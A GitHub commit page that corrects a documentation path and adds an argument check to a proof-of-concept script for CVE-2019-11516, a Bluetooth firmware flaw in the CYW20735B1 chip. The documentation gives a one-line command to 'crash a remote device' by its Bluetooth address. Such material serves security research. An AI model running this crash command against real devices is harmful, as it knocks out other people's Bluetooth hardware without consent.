Skip to content

Commit

Permalink
fixed doku
Browse files Browse the repository at this point in the history
  • Loading branch information
bolek42 committed Apr 22, 2021
1 parent 020933a commit efc719a
Show file tree
Hide file tree
Showing 2 changed files with 7 additions and 1 deletion.
2 changes: 1 addition & 1 deletion doc/CVE_2019_11516.md
Expand Up @@ -36,7 +36,7 @@ We provide a patch for the CYW20735B1 that can be loaded using the modified inte

To crash a remote device run

bash projects/CYW20735B1/gen/CVE_2019_11516.sh hci1 ca:fe:ba:be:13:37
bash projects/CYW20735B1/patch/CVE_2019_11516.sh hci1 ca:fe:ba:be:13:37



Expand Down
6 changes: 6 additions & 0 deletions projects/CYW20735B1/patch/CVE_2019_11516.sh
@@ -1,3 +1,9 @@
if [ $# -lt 2 ]
then
echo "usage: $0 hci0 <target address>"
exit 1
fi

systemctl restart bluetooth.service
hciconfig $1 up
hciconfig $1 iscan
Expand Down

0 comments on commit efc719a

Please sign in to comment.